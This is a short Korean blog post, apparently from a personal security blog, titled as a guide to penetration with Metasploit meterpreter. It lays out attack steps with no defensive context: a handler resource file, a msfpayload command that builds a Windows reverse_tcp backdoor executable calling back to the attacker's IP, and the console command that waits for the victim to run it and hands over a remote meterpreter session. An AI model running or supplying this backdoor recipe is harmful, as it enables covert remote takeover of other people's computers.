Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 |
Tags
- docker
- bash
- application security
- ssh key 배포
- 한글가이드
- freebsd
- Proxy
- ELASTIC
- miniconda
- Windows
- ansible
- centos 8
- elastic stack
- G-suite
- Kibana
- hardening
- 로그인불가
- x-pack
- XCP-ng
- Elasticsearch
- GitLab
- endpoint security
- PlayBook
- macos
- proxycfg
- 보안양파
- xe guest utilities
- pfsense
- Kibana server is not ready yet
Archives
- Today
- Total
선 밖에 선 자유인
Metasploit meterpreter를 이용한 침투 본문
- 리소스 파일 생성 (attacker_.rc)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set ExitSession false
exploit -j -z
- reverse_tcp 백도어 생성
msfpayload windows/meterpreter/reverse_tcp LHOST=<공격자 ip> X > reverse_tcp.exe
- 공격자 pc에서 리소스 실행
msfconsole -r attacker_.rc
- 사용자가 백도어를 실행하게 되면 reverse_tcp connection 연결
- 공격자는 sessions -i <번호>를 통해 meterpreter 조작 가능
Comments